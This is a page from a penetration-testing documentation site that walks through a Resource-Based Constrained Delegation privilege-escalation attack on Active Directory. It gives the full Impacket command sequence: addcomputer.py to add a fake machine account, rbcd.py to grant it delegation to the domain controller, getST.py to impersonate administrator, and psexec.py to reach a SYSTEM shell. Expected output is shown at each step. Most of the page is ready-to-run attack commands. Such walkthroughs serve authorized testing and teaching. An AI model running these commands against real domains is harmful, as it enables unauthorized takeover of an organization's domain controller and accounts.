Terminal Docs 💫
Terminal DocsTerminal Docs
DocumentationLinuxWindowsNetworksPentesting NetworksPentesting LinuxPentesting WindowsPentesting Web
Active Directory

Resource-Based Constrained Delegation (RBCD)

Active Directory Privilege Escalation

Resource-Based Constrained Delegation Attack Path Using Impacket

1. Adding a Fake Computer Account

The first step in this attack is to add a fake computer account to the domain. This is done using Impacket's addcomputer.py script. We will create a fake computer named fakehost and set a password for it.

python3 /usr/share/doc/python3-impacket/examples/addcomputer.py -dc-ip 10.0.0.1 -computer-pass fakepass123 -computer-name fakehost dc.local/username:password123

Explanation:

  • -dc-ip 10.0.0.1: IP address of the Domain Controller (DC).
  • -computer-pass fakepass123: Set the password for the fake computer account.
  • -computer-name fakehost: The name of the fake computer.
  • dc.local/username:password123: Credentials for a valid domain user.

Output:

[*] Successfully added machine account fakehost$ with password fakepass123.

2. Set RBCD Permissions on the Fake Computer

Next, we use Impacket's rbcd.py to grant delegation rights to fakehost$, allowing it to impersonate users on the DC (dc$).

python3 /usr/share/doc/python3-impacket/examples/rbcd.py -action write -delegate-to "dc$" -delegate-from "fakehost$" -dc-ip 10.0.0.1 dc.local/username:password123

Explanation:

  • -delegate-to "dc$": Grant rights to impersonate users on the DC.
  • -delegate-from "fakehost$": The fake computer that gets impersonation rights.
  • -dc-ip 10.0.0.1: IP of the Domain Controller.

3. Requesting a Service Ticket with S4U2Self

Now we impersonate administrator using S4U2Self and request a service ticket for a service on the DC.

python3 /usr/share/doc/python3-impacket/examples/getST.py dc.local/fakehost$:fakepass123 -spn www/dc.dc.local -impersonate administrator

Explanation:

  • dc.local/fakehost$:fakepass123: Fake computer credentials.
  • -spn www/dc.dc.local: Target SPN.
  • -impersonate administrator: The user to impersonate.

4. Export and Verify the Ticket

export KRB5CCNAME=administrator.ccache
klist

Expected Output:

Ticket cache: FILE:administrator.ccache
Default principal: administrator@DC.LOCAL

5. Use the Ticket with Impacket’s PSExec

python3 /usr/share/doc/python3-impacket/examples/psexec.py -k -no-pass dc.local/administrator@dc.dc.local -dc-ip 10.0.0.1

Explanation:

  • -k: Use Kerberos ticket.
  • -no-pass: No password needed.
  • dc.local/administrator@dc.dc.local: Use impersonated user and SPN.

Output:

Microsoft Windows [Version ...]
C:\Windows\system32> whoami
nt authority\system

Conclusion

This path demonstrates privilege escalation via Resource-Based Constrained Delegation (RBCD) using:

  1. addcomputer.py to add a fake computer.
  2. rbcd.py to give it impersonation rights.
  3. getST.py to impersonate administrator.
  4. psexec.py with Kerberos to get SYSTEM access.

Last updated on

Active Directory Enumeration

Active Directory

On this page

Resource-Based Constrained Delegation Attack Path Using Impacket
1. Adding a Fake Computer Account
2. Set RBCD Permissions on the Fake Computer
3. Requesting a Service Ticket with S4U2Self
4. Export and Verify the Ticket
5. Use the Ticket with Impacket’s PSExec
Conclusion